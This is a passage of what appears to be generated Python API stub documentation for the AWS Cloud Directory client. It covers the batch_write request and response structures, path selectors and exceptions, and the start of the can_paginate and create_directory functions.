'AttributeUpdateValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
}
},
]
}
},
]
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Directory . For more information, see arns .\n
:type Operations: list
:param Operations: [REQUIRED]\nA list of operations that are part of the batch.\n\n(dict) --Represents the output of a BatchWrite operation.\n\nCreateObject (dict) --Creates an object.\n\nSchemaFacet (list) -- [REQUIRED]A list of FacetArns that will be associated with the object. For more information, see arns .\n\n(dict) --A facet.\n\nSchemaArn (string) --The ARN of the schema that contains the facet with no minor component. See arns and In-Place Schema Upgrade for a description of when to provide minor versions.\n\nFacetName (string) --The name of the facet.\n\n\n\n\n\nObjectAttributeList (list) -- [REQUIRED]An attribute map, which contains an attribute ARN as the key and attribute value as the map value.\n\n(dict) --The combination of an attribute key and an attribute value.\n\nKey (dict) -- [REQUIRED]The key of the attribute.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.\n\nFacetName (string) -- [REQUIRED]The name of the facet that the attribute exists within.\n\nName (string) -- [REQUIRED]The name of the attribute.\n\n\n\nValue (dict) -- [REQUIRED]The value of the attribute.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\nParentReference (dict) --If specified, the parent reference to which this object will be attached.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . 
You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nLinkName (string) --The name of the link.\n\nBatchReferenceName (string) --The batch reference name. See Transaction Support for more information.\n\n\n\nAttachObject (dict) --Attaches an object to a Directory .\n\nParentReference (dict) -- [REQUIRED]The parent object reference.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nChildReference (dict) -- [REQUIRED]The child object reference that is to be attached to the object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. 
For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nLinkName (string) -- [REQUIRED]The name of the link.\n\n\n\nDetachObject (dict) --Detaches an object from a Directory .\n\nParentReference (dict) -- [REQUIRED]Parent reference from which the object with the specified link name is detached.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nLinkName (string) -- [REQUIRED]The name of the link.\n\nBatchReferenceName (string) --The batch reference name. 
See Transaction Support for more information.\n\n\n\nUpdateObjectAttributes (dict) --Updates a given object\'s attributes.\n\nObjectReference (dict) -- [REQUIRED]Reference that identifies the object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nAttributeUpdates (list) -- [REQUIRED]Attributes update structure.\n\n(dict) --Structure that contains attribute update information.\n\nObjectAttributeKey (dict) --The key of the attribute being updated.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.\n\nFacetName (string) -- [REQUIRED]The name of the facet that the attribute exists within.\n\nName (string) -- [REQUIRED]The name of the attribute.\n\n\n\nObjectAttributeAction (dict) --The action to perform as part of the attribute update.\n\nObjectAttributeActionType (string) --A type that can be either Update or Delete .\n\nObjectAttributeUpdateValue (dict) --The value that you want to update to.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time 
value.\n\n\n\n\n\n\n\n\n\n\n\nDeleteObject (dict) --Deletes an object in a Directory .\n\nObjectReference (dict) -- [REQUIRED]The reference that identifies the object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\n\n\nAddFacetToObject (dict) --A batch operation that adds a facet to an object.\n\nSchemaFacet (dict) -- [REQUIRED]Represents the facet being added to the object.\n\nSchemaArn (string) --The ARN of the schema that contains the facet with no minor component. 
See arns and In-Place Schema Upgrade for a description of when to provide minor versions.\n\nFacetName (string) --The name of the facet.\n\n\n\nObjectAttributeList (list) -- [REQUIRED]The attributes to set on the object.\n\n(dict) --The combination of an attribute key and an attribute value.\n\nKey (dict) -- [REQUIRED]The key of the attribute.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.\n\nFacetName (string) -- [REQUIRED]The name of the facet that the attribute exists within.\n\nName (string) -- [REQUIRED]The name of the attribute.\n\n\n\nValue (dict) -- [REQUIRED]The value of the attribute.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\nObjectReference (dict) -- [REQUIRED]A reference to the object being mutated.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. 
An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\n\n\nRemoveFacetFromObject (dict) --A batch operation that removes a facet from an object.\n\nSchemaFacet (dict) -- [REQUIRED]The facet to remove from the object.\n\nSchemaArn (string) --The ARN of the schema that contains the facet with no minor component. See arns and In-Place Schema Upgrade for a description of when to provide minor versions.\n\nFacetName (string) --The name of the facet.\n\n\n\nObjectReference (dict) -- [REQUIRED]A reference to the object whose facet will be removed.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\n\n\nAttachPolicy (dict) --Attaches a policy object to a regular object. An object can have a limited number of attached policies.\n\nPolicyReference (dict) -- [REQUIRED]The reference that is associated with the policy object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. 
Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nObjectReference (dict) -- [REQUIRED]The reference that identifies the object to which the policy will be attached.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\n\n\nDetachPolicy (dict) --Detaches a policy from a Directory .\n\nPolicyReference (dict) -- [REQUIRED]Reference that identifies the policy object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. 
For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nObjectReference (dict) -- [REQUIRED]Reference that identifies the object whose policy object will be detached.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\n\n\nCreateIndex (dict) --Creates an index object. See Indexing and search for more information.\n\nOrderedIndexedAttributeList (list) -- [REQUIRED]Specifies the attributes that should be indexed on. 
Currently only a single attribute is supported.\n\n(dict) --A unique identifier for an attribute.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.\n\nFacetName (string) -- [REQUIRED]The name of the facet that the attribute exists within.\n\nName (string) -- [REQUIRED]The name of the attribute.\n\n\n\n\n\nIsUnique (boolean) -- [REQUIRED]Indicates whether the attribute that is being indexed has unique values or not.\n\nParentReference (dict) --A reference to the parent object that contains the index object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nLinkName (string) --The name of the link between the parent object and the index object.\n\nBatchReferenceName (string) --The batch reference name. See Transaction Support for more information.\n\n\n\nAttachToIndex (dict) --Attaches the specified object to the specified index.\n\nIndexReference (dict) -- [REQUIRED]A reference to the index that you are attaching the object to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. 
Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nTargetReference (dict) -- [REQUIRED]A reference to the object that you are attaching to the index.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\n\n\nDetachFromIndex (dict) --Detaches the specified object from the specified index.\n\nIndexReference (dict) -- [REQUIRED]A reference to the index object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. 
For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nTargetReference (dict) -- [REQUIRED]A reference to the object being detached from the index.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\n\n\nAttachTypedLink (dict) --Attaches a typed link to a specified source and target object. For more information, see Typed Links .\n\nSourceObjectReference (dict) -- [REQUIRED]Identifies the source object that the typed link will attach to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. 
For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nTargetObjectReference (dict) -- [REQUIRED]Identifies the target object that the typed link will attach to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nTypedLinkFacet (dict) -- [REQUIRED]Identifies the typed link facet that is associated with the typed link.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) that is associated with the schema. 
For more information, see arns .\n\nTypedLinkName (string) -- [REQUIRED]The unique name of the typed link facet.\n\n\n\nAttributes (list) -- [REQUIRED]A set of attributes that are associated with the typed link.\n\n(dict) --Identifies the attribute name and value for a typed link.\n\nAttributeName (string) -- [REQUIRED]The attribute name of the typed link.\n\nValue (dict) -- [REQUIRED]The value for the typed link.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n\nDetachTypedLink (dict) --Detaches a typed link from a specified source and target object. For more information, see Typed Links .\n\nTypedLinkSpecifier (dict) -- [REQUIRED]Used to accept a typed link specifier as input.\n\nTypedLinkFacet (dict) -- [REQUIRED]Identifies the typed link facet that is associated with the typed link.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .\n\nTypedLinkName (string) -- [REQUIRED]The unique name of the typed link facet.\n\n\n\nSourceObjectReference (dict) -- [REQUIRED]Identifies the source object that the typed link will attach to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. 
An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nTargetObjectReference (dict) -- [REQUIRED]Identifies the target object that the typed link will attach to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nIdentityAttributeValues (list) -- [REQUIRED]Identifies the attribute value to update.\n\n(dict) --Identifies the attribute name and value for a typed link.\n\nAttributeName (string) -- [REQUIRED]The attribute name of the typed link.\n\nValue (dict) -- [REQUIRED]The value for the typed link.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n\n\n\nUpdateLinkAttributes (dict) --Updates a given object\'s attributes.\n\nTypedLinkSpecifier (dict) -- [REQUIRED]Allows a typed link specifier to be accepted as input.\n\nTypedLinkFacet (dict) -- [REQUIRED]Identifies the typed link facet that is associated with the typed 
link.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .\n\nTypedLinkName (string) -- [REQUIRED]The unique name of the typed link facet.\n\n\n\nSourceObjectReference (dict) -- [REQUIRED]Identifies the source object that the typed link will attach to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nTargetObjectReference (dict) -- [REQUIRED]Identifies the target object that the typed link will attach to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. 
An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nIdentityAttributeValues (list) -- [REQUIRED]Identifies the attribute value to update.\n\n(dict) --Identifies the attribute name and value for a typed link.\n\nAttributeName (string) -- [REQUIRED]The attribute name of the typed link.\n\nValue (dict) -- [REQUIRED]The value for the typed link.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n\nAttributeUpdates (list) -- [REQUIRED]The attributes update structure.\n\n(dict) --Structure that contains attribute update information.\n\nAttributeKey (dict) --The key of the attribute being updated.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.\n\nFacetName (string) -- [REQUIRED]The name of the facet that the attribute exists within.\n\nName (string) -- [REQUIRED]The name of the attribute.\n\n\n\nAttributeAction (dict) --The action to perform as part of the attribute update.\n\nAttributeActionType (string) --A type that can be either UPDATE_OR_CREATE or DELETE .\n\nAttributeUpdateValue (dict) --The value that you want to update to.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'Responses': [
{
'CreateObject': {
'ObjectIdentifier': 'string'
},
'AttachObject': {
'attachedObjectIdentifier': 'string'
},
'DetachObject': {
'detachedObjectIdentifier': 'string'
},
'UpdateObjectAttributes': {
'ObjectIdentifier': 'string'
},
'DeleteObject': {},
'AddFacetToObject': {},
'RemoveFacetFromObject': {},
'AttachPolicy': {},
'DetachPolicy': {},
'CreateIndex': {
'ObjectIdentifier': 'string'
},
'AttachToIndex': {
'AttachedObjectIdentifier': 'string'
},
'DetachFromIndex': {
'DetachedObjectIdentifier': 'string'
},
'AttachTypedLink': {
'TypedLinkSpecifier': {
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
}
},
'DetachTypedLink': {},
'UpdateLinkAttributes': {}
},
]
}
Response Structure
(dict) --
Responses (list) --
A list of all the responses for each batch write.
(dict) --
Represents the output of a BatchWrite response operation.
CreateObject (dict) --
Creates an object in a Directory .
ObjectIdentifier (string) --
The ID that is associated with the object.
AttachObject (dict) --
Attaches an object to a Directory .
attachedObjectIdentifier (string) --
The ObjectIdentifier of the object that has been attached.
DetachObject (dict) --
Detaches an object from a Directory .
detachedObjectIdentifier (string) --
The ObjectIdentifier of the detached object.
UpdateObjectAttributes (dict) --
Updates a given object\xe2\x80\x99s attributes.
ObjectIdentifier (string) --
ID that is associated with the object.
DeleteObject (dict) --
Deletes an object in a Directory .
AddFacetToObject (dict) --
The result of an add facet to object batch operation.
RemoveFacetFromObject (dict) --
The result of a batch remove facet from object operation.
AttachPolicy (dict) --
Attaches a policy object to a regular object. An object can have a limited number of attached policies.
DetachPolicy (dict) --
Detaches a policy from a Directory .
CreateIndex (dict) --
Creates an index object. See Indexing and search for more information.
ObjectIdentifier (string) --
The ObjectIdentifier of the index created by this operation.
AttachToIndex (dict) --
Attaches the specified object to the specified index.
AttachedObjectIdentifier (string) --
The ObjectIdentifier of the object that was attached to the index.
DetachFromIndex (dict) --
Detaches the specified object from the specified index.
DetachedObjectIdentifier (string) --
The ObjectIdentifier of the object that was detached from the index.
AttachTypedLink (dict) --
Attaches a typed link to a specified source and target object. For more information, see Typed Links .
TypedLinkSpecifier (dict) --
Returns a typed link specifier as output.
TypedLinkFacet (dict) --
Identifies the typed link facet that is associated with the typed link.
SchemaArn (string) --
The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .
TypedLinkName (string) --
The unique name of the typed link facet.
SourceObjectReference (dict) --
Identifies the source object that the typed link will attach to.
Selector (string) --
A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
TargetObjectReference (dict) --
Identifies the target object that the typed link will attach to.
Selector (string) --
A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
IdentityAttributeValues (list) --
Identifies the attribute value to update.
(dict) --
Identifies the attribute name and value for a typed link.
AttributeName (string) --
The attribute name of the typed link.
Value (dict) --
The value for the typed link.
StringValue (string) --
A string data value.
BinaryValue (bytes) --
A binary data value.
BooleanValue (boolean) --
A Boolean data value.
NumberValue (string) --
A number data value.
DatetimeValue (datetime) --
A date and time value.
DetachTypedLink (dict) --
Detaches a typed link from a specified source and target object. For more information, see Typed Links .
UpdateLinkAttributes (dict) --
Represents the output of a BatchWrite response operation.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.BatchWriteException
:return: {
'Responses': [
{
'CreateObject': {
'ObjectIdentifier': 'string'
},
'AttachObject': {
'attachedObjectIdentifier': 'string'
},
'DetachObject': {
'detachedObjectIdentifier': 'string'
},
'UpdateObjectAttributes': {
'ObjectIdentifier': 'string'
},
'DeleteObject': {},
'AddFacetToObject': {},
'RemoveFacetFromObject': {},
'AttachPolicy': {},
'DetachPolicy': {},
'CreateIndex': {
'ObjectIdentifier': 'string'
},
'AttachToIndex': {
'AttachedObjectIdentifier': 'string'
},
'DetachFromIndex': {
'DetachedObjectIdentifier': 'string'
},
'AttachTypedLink': {
'TypedLinkSpecifier': {
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
}
},
'DetachTypedLink': {},
'UpdateLinkAttributes': {}
},
]
}
:returns:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
"""
pass
def can_paginate(operation_name=None):
    """Check whether the named client operation supports pagination.

    :type operation_name: string
    :param operation_name: The operation name. This is the same name as the
        method name on the client. For example, if the method name is
        ``create_foo`` and you'd normally invoke the operation as
        ``client.create_foo(**kwargs)``, then — if the ``create_foo``
        operation can be paginated — you can use the call
        ``client.get_paginator('create_foo')``.
    """
    pass
def create_directory(Name=None, SchemaArn=None):
    """Create a Directory by copying the published schema into the directory.

    A directory cannot be created without a schema. You can also quickly
    create a directory using a managed schema, called the QuickStartSchema.
    For more information, see Managed Schema in the Amazon Cloud Directory
    Developer Guide.

    See also: AWS API Documentation

    :example: response = client.create_directory(
        Name='string',
        SchemaArn='string'
    )

    :type Name: string
    :param Name: [REQUIRED] The name of the Directory. Should be unique per
        account, per region.

    :type SchemaArn: string
    :param SchemaArn: [REQUIRED] The Amazon Resource Name (ARN) of the
        published schema that will be copied into the data Directory. For
        more information, see arns.

    :rtype: dict
    :return: {
            'DirectoryArn': 'string',      # ARN associated with the Directory
            'Name': 'string',              # name of the Directory
            'ObjectIdentifier': 'string',  # root object node of the created directory
            'AppliedSchemaArn': 'string'   # ARN of the applied (copied) schema; once a
                                           # published schema is copied into the directory
                                           # it has its own ARN (the applied schema ARN)
        }

    :raises:
        CloudDirectory.Client.exceptions.InternalServiceException
        CloudDirectory.Client.exceptions.InvalidArnException
